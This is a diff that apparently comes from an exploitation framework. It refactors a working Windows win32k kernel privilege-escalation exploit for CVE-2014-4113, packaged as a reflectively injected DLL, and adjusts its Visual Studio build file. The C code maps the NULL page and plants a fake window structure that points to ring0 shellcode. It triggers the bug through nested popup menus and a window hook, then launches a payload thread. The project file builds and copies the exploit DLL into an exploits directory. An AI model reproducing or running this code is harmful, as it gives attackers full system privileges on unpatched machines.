#ifdef _M_X64
|
||||||
ULONGLONG base_address = 0x00000000fffffffb;
|
ULONGLONG dwBaseAddress = 0x00000000fffffffb;
|
||||||
#else
|
#else
|
||||||
DWORD base_address = 1;
|
DWORD dwBaseAddress = 1;
|
||||||
#endif
|
#endif
|
||||||
SIZE_T region_size = 0x1000;
|
|
||||||
ULONG zero_bits = 0;
|
|
||||||
HANDLE current_process = NULL;
|
|
||||||
|
|
||||||
current_process = GetCurrentProcess();
|
SIZE_T sRegionSize = 0x1000;
|
||||||
|
ULONG ulAllocationType = MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN;
|
||||||
|
|
||||||
if (pNtAllocateVirtualMemory(current_process, (LPVOID*)(&base_address), 0, ®ion_size, (MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN), PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS) {
|
if (pNtAllocateVirtualMemory(GetCurrentProcess(), (LPVOID*)&dwBaseAddress, 0, &sRegionSize, ulAllocationType, PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS)
|
||||||
LogMessage("[!] Failed to allocate null page");
|
{
|
||||||
|
dprintf("[!] Failed to allocate null page");
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
LogMessage("[*] Getting PtiCurrent...");
|
dprintf("[*] Getting PtiCurrent...");
|
||||||
|
|
||||||
#ifdef _M_X64
|
DWORD_PTR dwThreadInfoPtr = get_threadinfo_ptr();
|
||||||
ULONGLONG pti = MyPtiCurrent();
|
|
||||||
#else
|
|
||||||
DWORD pti = MyPtiCurrent();
|
|
||||||
#endif
|
|
||||||
|
|
||||||
if (pti == 0) {
|
if (dwThreadInfoPtr == 0)
|
||||||
|
{
|
||||||
LoadLibrary("user32.dll");
|
LoadLibrary("user32.dll");
|
||||||
LoadLibrary("gdi32.dll");
|
LoadLibrary("gdi32.dll");
|
||||||
pti = MyPtiCurrent();
|
dwThreadInfoPtr = get_threadinfo_ptr();
|
||||||
}
|
}
|
||||||
|
|
||||||
if (pti == 0) {
|
if (dwThreadInfoPtr == 0)
|
||||||
LogMessage("[!] Filed to get PtiCurrent");
|
{
|
||||||
|
dprintf("[!] Filed to get current thread information");
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
else {
|
|
||||||
#ifdef _M_X64
|
|
||||||
LogMessage("[*] Good! pti 0x%016llx", pti);
|
|
||||||
#else
|
|
||||||
LogMessage("[*] Good! pti 0x%08x", pti);
|
|
||||||
#endif
|
|
||||||
}
|
|
||||||
|
|
||||||
LogMessage("[*] Creating a fake structure at NULL...");
|
dprintf("[*] Good! dwThreadInfoPtr 0x%p", dwThreadInfoPtr);
|
||||||
|
dprintf("[*] Creating a fake structure at NULL...");
|
||||||
|
|
||||||
|
LPVOID lpPtr = NULL;
|
||||||
#ifdef _M_X64
|
#ifdef _M_X64
|
||||||
void *test = NULL;
|
(DWORD_PTR)lpPtr = 0x10000000B;
|
||||||
(QWORD)test = 0x10000000B;
|
*((PDWORD_PTR)lpPtr) = dwThreadInfoPtr;
|
||||||
*((PQWORD)test) = pti;
|
|
||||||
|
|
||||||
/* win32k!tagWND->bServerSideWindowProc = TRUE */
|
/* win32k!tagWND->bServerSideWindowProc = TRUE */
|
||||||
(QWORD)test = 0x100000025;
|
(DWORD_PTR)lpPtr = 0x100000025;
|
||||||
*((PBYTE)test) = 4;
|
*((PBYTE)lpPtr) = 4;
|
||||||
|
|
||||||
/* win32k!tagWND->lpfnWndProc = &shellcode_ring0 */
|
/* win32k!tagWND->lpfnWndProc = &shellcode_ring0 */
|
||||||
(QWORD)test = 0x10000008B;
|
(DWORD_PTR)lpPtr = 0x10000008B;
|
||||||
*((PQWORD)test) = &shellcode_ring0;
|
*((PDWORD_PTR)lpPtr) = (DWORD_PTR)shellcode_ring0;
|
||||||
#else
|
#else
|
||||||
void *test = promise_land + 3;
|
LPBYTE lpPromisedLand = NULL;
|
||||||
|
lpPtr = lpPromisedLand + 3;
|
||||||
/* We need to save this check, otherwise unmapped memory will be dereferenced (blue screen)
|
/* We need to save this check, otherwise unmapped memory will be dereferenced (blue screen)
|
||||||
.text:BF8B93F4 02C mov edi, _gptiCurrent
|
.text:BF8B93F4 02C mov edi, _gptiCurrent
|
||||||
.text:BF8B93FA 02C cmp edi, [esi + 8];
|
.text:BF8B93FA 02C cmp edi, [esi + 8];
|
||||||
.text:BF8B93FD 02C jz loc_BF8B
|
.text:BF8B93FD 02C jz loc_BF8B
|
||||||
*/
|
*/
|
||||||
*(LPDWORD)test = pti;
|
*(LPDWORD)lpPtr = dwThreadInfoPtr;
|
||||||
|
|
||||||
*((LPBYTE)(promise_land + 0x11)) = 0x4;
|
*((LPBYTE)(lpPromisedLand + 0x11)) = 0x4;
|
||||||
|
|
||||||
test = promise_land + 0x5b;
|
lpPtr = lpPromisedLand + 0x5b;
|
||||||
*(LPDWORD)test = (DWORD)shellcode_ring0;
|
*(LPDWORD)lpPtr = (DWORD)shellcode_ring0;
|
||||||
#endif
|
#endif
|
||||||
|
|
||||||
// Exploit!
|
// Exploit!
|
||||||
|
|
||||||
LogMessage("[*] Triggering vulnerability...");
|
dprintf("[*] Triggering vulnerability...");
|
||||||
HMENU MenuOne = CreatePopupMenu();
|
HMENU hMenuOne = CreatePopupMenu();
|
||||||
if (MenuOne == NULL) {
|
if (hMenuOne == NULL)
|
||||||
LogMessage("[!] First CreatePopupMenu failed");
|
{
|
||||||
|
dprintf("[!] First CreatePopupMenu failed");
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
MENUITEMINFOA MenuOneInfo;
|
MENUITEMINFOA menuOneInfo;
|
||||||
memset(&MenuOneInfo, 0, sizeof(MENUITEMINFOA));
|
memset(&menuOneInfo, 0, sizeof(MENUITEMINFOA));
|
||||||
MenuOneInfo.cbSize = sizeof(MENUITEMINFOA);
|
menuOneInfo.cbSize = sizeof(MENUITEMINFOA);
|
||||||
MenuOneInfo.fMask = MIIM_STRING;
|
menuOneInfo.fMask = MIIM_STRING;
|
||||||
|
|
||||||
if (InsertMenuItemA(MenuOne, 0, TRUE, &MenuOneInfo) != TRUE) {
|
if (InsertMenuItemA(hMenuOne, 0, TRUE, &menuOneInfo) != TRUE)
|
||||||
LogMessage("[!] First InsertMenuItemA failed");
|
{
|
||||||
DestroyMenu(MenuOne);
|
dprintf("[!] First InsertMenuItemA failed");
|
||||||
|
DestroyMenu(hMenuOne);
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
HMENU MenuTwo = CreatePopupMenu();
|
HMENU hMenuTwo = CreatePopupMenu();
|
||||||
if (MenuTwo == NULL) {
|
if (hMenuTwo == NULL)
|
||||||
LogMessage("[!] Second CreatePopupMenu failed");
|
{
|
||||||
DestroyMenu(MenuOne);
|
dprintf("[!] Second CreatePopupMenu failed");
|
||||||
|
DestroyMenu(hMenuOne);
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
MENUITEMINFOA MenuTwoInfo;
|
MENUITEMINFOA menuTwoInfo;
|
||||||
memset(&MenuTwoInfo, 0, sizeof(MENUITEMINFOA));
|
memset(&menuTwoInfo, 0, sizeof(MENUITEMINFOA));
|
||||||
MenuTwoInfo.cbSize = sizeof(MENUITEMINFOA);
|
menuTwoInfo.cbSize = sizeof(MENUITEMINFOA);
|
||||||
MenuTwoInfo.fMask = (MIIM_STRING | MIIM_SUBMENU);
|
menuTwoInfo.fMask = (MIIM_STRING | MIIM_SUBMENU);
|
||||||
MenuTwoInfo.dwTypeData = "";
|
menuTwoInfo.dwTypeData = "";
|
||||||
MenuTwoInfo.cch = 1;
|
menuTwoInfo.cch = 1;
|
||||||
MenuTwoInfo.hSubMenu = MenuOne;
|
menuTwoInfo.hSubMenu = hMenuOne;
|
||||||
if (InsertMenuItemA(MenuTwo, 0, TRUE, &MenuTwoInfo) != TRUE) {
|
|
||||||
LogMessage("[!] Second InsertMenuItemA failed");
|
if (InsertMenuItemA(hMenuTwo, 0, TRUE, &menuTwoInfo) != TRUE)
|
||||||
DestroyMenu(MenuTwo);
|
{
|
||||||
DestroyMenu(MenuOne);
|
dprintf("[!] Second InsertMenuItemA failed");
|
||||||
|
DestroyMenu(hMenuTwo);
|
||||||
|
DestroyMenu(hMenuOne);
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
if (SetWindowsHookExA(WH_CALLWNDPROC, HookCallback, NULL, GetCurrentThreadId()) == NULL) {
|
if (SetWindowsHookExA(WH_CALLWNDPROC, hook_callback, NULL, GetCurrentThreadId()) == NULL)
|
||||||
LogMessage("[!] SetWindowsHookExA failed :-(\n");
|
{
|
||||||
DestroyMenu(MenuTwo);
|
dprintf("[!] SetWindowsHookExA failed :-(");
|
||||||
DestroyMenu(MenuOne);
|
DestroyMenu(hMenuTwo);
|
||||||
|
DestroyMenu(hMenuOne);
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
// 'crash' it!
|
// 'crash' it!
|
||||||
TrackPopupMenu(MenuTwo, 0, -10000, -10000, 0, hWnd, NULL);
|
TrackPopupMenu(hMenuTwo, 0, -10000, -10000, 0, hWnd, NULL);
|
||||||
|
|
||||||
// If everything worked process should be privileges at this point
|
// If everything worked process should be privileges at this point
|
||||||
LogMessage("[!] Executing payload...");
|
dprintf("[!] Executing payload...");
|
||||||
CreateThread(0, 0, ExecutePayload, lpPayload, 0, NULL);
|
CreateThread(0, 0, execute_payload, lpPayload, 0, NULL);
|
||||||
return;
|
|
||||||
}
|
}
|
||||||
|
|
||||||
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) {
|
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
|
||||||
|
{
|
||||||
BOOL bReturnValue = TRUE;
|
BOOL bReturnValue = TRUE;
|
||||||
switch (dwReason) {
|
switch (dwReason)
|
||||||
|
{
|
||||||
case DLL_QUERY_HMODULE:
|
case DLL_QUERY_HMODULE:
|
||||||
hAppInstance = hinstDLL;
|
hAppInstance = hinstDLL;
|
||||||
if (lpReserved != NULL) {
|
if (lpReserved != NULL)
|
||||||
|
{
|
||||||
*(HMODULE *)lpReserved = hAppInstance;
|
*(HMODULE *)lpReserved = hAppInstance;
|
||||||
}
|
}
|
||||||
break;
|
break;
|
||||||
case DLL_PROCESS_ATTACH:
|
case DLL_PROCESS_ATTACH:
|
||||||
hAppInstance = hinstDLL;
|
hAppInstance = hinstDLL;
|
||||||
Win32kNullPage(lpReserved);
|
win32k_null_page(lpReserved);
|
||||||
break;
|
break;
|
||||||
case DLL_PROCESS_DETACH:
|
case DLL_PROCESS_DETACH:
|
||||||
case DLL_THREAD_ATTACH:
|
case DLL_THREAD_ATTACH:
|
||||||
|
@ -487,4 +496,4 @@ BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) {
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
return bReturnValue;
|
return bReturnValue;
|
||||||
};
|
}
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
<?xml version="1.0" encoding="utf-8"?>
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
<ItemGroup Label="ProjectConfigurations">
|
<ItemGroup Label="ProjectConfigurations">
|
||||||
<ProjectConfiguration Include="Debug|Win32">
|
<ProjectConfiguration Include="Debug|Win32">
|
||||||
<Configuration>Debug</Configuration>
|
<Configuration>Debug</Configuration>
|
||||||
|
@ -19,132 +19,224 @@
|
||||||
</ProjectConfiguration>
|
</ProjectConfiguration>
|
||||||
</ItemGroup>
|
</ItemGroup>
|
||||||
<PropertyGroup Label="Globals">
|
<PropertyGroup Label="Globals">
|
||||||
<ProjectGuid>{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}</ProjectGuid>
|
<ProjectGuid>{E80F11CD-6698-492F-B4B0-1A2348A24BB0}</ProjectGuid>
|
||||||
<RootNamespace>cve20144113</RootNamespace>
|
<RootNamespace>cve-2014-4113</RootNamespace>
|
||||||
|
<Keyword>Win32Proj</Keyword>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
|
||||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
|
||||||
<UseDebugLibraries>true</UseDebugLibraries>
|
|
||||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
|
||||||
<CharacterSet>MultiByte</CharacterSet>
|
|
||||||
<PlatformToolset>v120</PlatformToolset>
|
|
||||||
</PropertyGroup>
|
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
|
||||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
|
||||||
<UseDebugLibraries>true</UseDebugLibraries>
|
|
||||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
|
||||||
<CharacterSet>MultiByte</CharacterSet>
|
|
||||||
<PlatformToolset>v120</PlatformToolset>
|
|
||||||
</PropertyGroup>
|
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
<UseDebugLibraries>false</UseDebugLibraries>
|
|
||||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
|
||||||
<CharacterSet>MultiByte</CharacterSet>
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
<PlatformToolset>v120</PlatformToolset>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
|
<PlatformToolset>v120_xp</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
<UseDebugLibraries>false</UseDebugLibraries>
|
|
||||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
|
||||||
<CharacterSet>MultiByte</CharacterSet>
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
<PlatformToolset>v120</PlatformToolset>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
|
<PlatformToolset>v120_xp</PlatformToolset>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
|
<PlatformToolset>v120_xp</PlatformToolset>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
|
<PlatformToolset>v120_xp</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||||
<ImportGroup Label="ExtensionSettings">
|
<ImportGroup Label="ExtensionSettings">
|
||||||
|
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
|
||||||
</ImportGroup>
|
</ImportGroup>
|
||||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
<ImportGroup Label="PropertySheets">
|
||||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
|
||||||
</ImportGroup>
|
|
||||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
|
|
||||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
|
||||||
</ImportGroup>
|
|
||||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
|
||||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
|
||||||
</ImportGroup>
|
|
||||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
|
|
||||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
</ImportGroup>
|
</ImportGroup>
|
||||||
<PropertyGroup Label="UserMacros" />
|
<PropertyGroup Label="UserMacros" />
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
<PropertyGroup>
|
||||||
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
|
<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
|
||||||
</PropertyGroup>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
</PropertyGroup>
|
<GenerateManifest>false</GenerateManifest>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
|
||||||
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
|
<CodeAnalysisRules />
|
||||||
</PropertyGroup>
|
<CodeAnalysisRuleAssemblies />
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
|
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
<CompileAs>CompileAsC</CompileAs>
|
|
||||||
<WarningLevel>Level3</WarningLevel>
|
|
||||||
<Optimization>Disabled</Optimization>
|
<Optimization>Disabled</Optimization>
|
||||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
<MinimalRebuild>true</MinimalRebuild>
|
||||||
|
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
|
||||||
|
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
|
||||||
|
<PrecompiledHeader>
|
||||||
|
</PrecompiledHeader>
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<TreatWarningAsError>true</TreatWarningAsError>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
|
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||||
|
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||||
|
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
|
||||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
<OptimizeReferences>true</OptimizeReferences>
|
<SubSystem>Windows</SubSystem>
|
||||||
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
|
<TargetMachine>MachineX86</TargetMachine>
|
||||||
|
<ModuleDefinitionFile>
|
||||||
|
</ModuleDefinitionFile>
|
||||||
|
<AdditionalOptions>/ignore:4070</AdditionalOptions>
|
||||||
</Link>
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
|
||||||
|
exit 0</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
|
<ResourceCompile>
|
||||||
|
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
</ResourceCompile>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
<CompileAs>CompileAsC</CompileAs>
|
|
||||||
<WarningLevel>Level3</WarningLevel>
|
|
||||||
<Optimization>Disabled</Optimization>
|
<Optimization>Disabled</Optimization>
|
||||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
|
||||||
|
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
|
||||||
|
<PrecompiledHeader>
|
||||||
|
</PrecompiledHeader>
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<TreatWarningAsError>true</TreatWarningAsError>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
|
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||||
|
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||||
|
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
|
||||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
<OptimizeReferences>true</OptimizeReferences>
|
<SubSystem>Windows</SubSystem>
|
||||||
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
|
<ModuleDefinitionFile>
|
||||||
|
</ModuleDefinitionFile>
|
||||||
|
<AdditionalOptions>/ignore:4070</AdditionalOptions>
|
||||||
</Link>
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
|
||||||
|
exit 0</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
|
<ResourceCompile>
|
||||||
|
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
</ResourceCompile>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
<CompileAs>CompileAsC</CompileAs>
|
<Optimization>MinSpace</Optimization>
|
||||||
<WarningLevel>Level3</WarningLevel>
|
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||||
<Optimization>Disabled</Optimization>
|
<IntrinsicFunctions>false</IntrinsicFunctions>
|
||||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
<CompileAs>Default</CompileAs>
|
<StringPooling>true</StringPooling>
|
||||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||||
|
<PrecompiledHeader>
|
||||||
|
</PrecompiledHeader>
|
||||||
|
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
|
||||||
|
<ObjectFileName>$(OutDir)\</ObjectFileName>
|
||||||
|
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||||
|
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
|
<TreatWarningAsError>true</TreatWarningAsError>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
|
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||||
|
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||||
|
<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
|
||||||
|
<IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
|
||||||
|
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
|
||||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||||
<OptimizeReferences>true</OptimizeReferences>
|
<GenerateMapFile>true</GenerateMapFile>
|
||||||
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
|
<MapFileName>$(OutDir)\cve-2014-4113.map</MapFileName>
|
||||||
|
<SubSystem>Windows</SubSystem>
|
||||||
|
<OptimizeReferences>
|
||||||
|
</OptimizeReferences>
|
||||||
|
<EnableCOMDATFolding>
|
||||||
|
</EnableCOMDATFolding>
|
||||||
|
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||||
|
<DataExecutionPrevention>
|
||||||
|
</DataExecutionPrevention>
|
||||||
|
<ImportLibrary>$(OutDir)\cve-2014-4113.lib</ImportLibrary>
|
||||||
|
<TargetMachine>MachineX86</TargetMachine>
|
||||||
|
<Profile>false</Profile>
|
||||||
|
<ModuleDefinitionFile>
|
||||||
|
</ModuleDefinitionFile>
|
||||||
|
<AdditionalOptions>/ignore:4070</AdditionalOptions>
|
||||||
</Link>
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
|
||||||
|
IF EXIST "..\..\..\..\..\data\exploits\CVE-2014-4113\" GOTO COPY
|
||||||
|
mkdir "..\..\..\..\..\data\exploits\CVE-2014-4113\"
|
||||||
|
:COPY
|
||||||
|
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2014-4113\"</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
<CompileAs>CompileAsC</CompileAs>
|
<Optimization>MinSpace</Optimization>
|
||||||
<WarningLevel>Level3</WarningLevel>
|
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||||
<Optimization>Disabled</Optimization>
|
<IntrinsicFunctions>false</IntrinsicFunctions>
|
||||||
